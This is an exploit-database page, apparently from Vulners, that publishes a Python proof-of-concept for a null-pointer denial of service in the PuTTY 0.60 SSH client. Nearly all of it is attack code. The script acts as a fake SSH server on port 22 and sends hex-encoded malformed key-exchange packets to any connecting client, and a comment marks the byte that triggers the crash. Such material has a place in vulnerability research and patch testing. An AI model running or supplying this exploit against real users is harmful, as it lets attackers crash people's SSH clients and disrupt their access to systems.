PuTTY 0.60 Denial Of Service (DOS)

🗓️ 25 Dec 2011 00:00:00Reported by RootType
Putty 0.60 Null Pointer Denial Of Service (DOS) exploi

                                                print &quot;\n&quot;
print &quot;----------------------------------------------------------------&quot;
print &quot;| putty 0.60 Null Ptr                                           |&quot;
print &quot;| Level Smash the Stack                                         |&quot;
print &quot;----------------------------------------------------------------&quot;
print &quot;\n&quot;
 
import sys, socket, binascii
HOST = sys.argv[1]
PORT = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
buf = [
    (&quot;5353482d322e302d57654f6e6c79446f20322e312e330d0a&quot;),
    (&quot;000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616&quot;
    &quot;e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613&quot;
    &quot;10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6&quot;
    &quot;362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726&quot;
    &quot;96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323&quot;
    &quot;5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657&quot;
    &quot;33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626&quot;
    &quot;32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322&quot;
    &quot;d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7&quot;
    &quot;22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6&quot;
    &quot;d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6&quot;
    &quot;d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000&quot;
    &quot;111001111111111111111111111111111&quot;), ## The 00 controls the crash
    (&quot;0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3&quot;
    &quot;64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c&quot;
    &quot;76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd&quot;
    &quot;85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0&quot;
    &quot;000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97&quot;
    &quot;3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d&quot;
    &quot;a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a&quot;
    &quot;f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15&quot;
    &quot;3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3&quot;
    &quot;b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca&quot;
    &quot;75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804&quot;
    &quot;20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc&quot;
    &quot;6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045&quot;
    &quot;ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf&quot;
    &quot;cac4453d629a47d000000000000000000&quot;),
    (&quot;0000000c0a15a1640000c32700008e14&quot;)
    ]
 
 
i = 0
for i in range(0,len(buf)):
    conn.send(binascii.unhexlify(buf[i]))
    i+=1
conn.close()
s.close()
25 Dec 2011 00:00Current
7.1High risk
Vulners AI Score7.1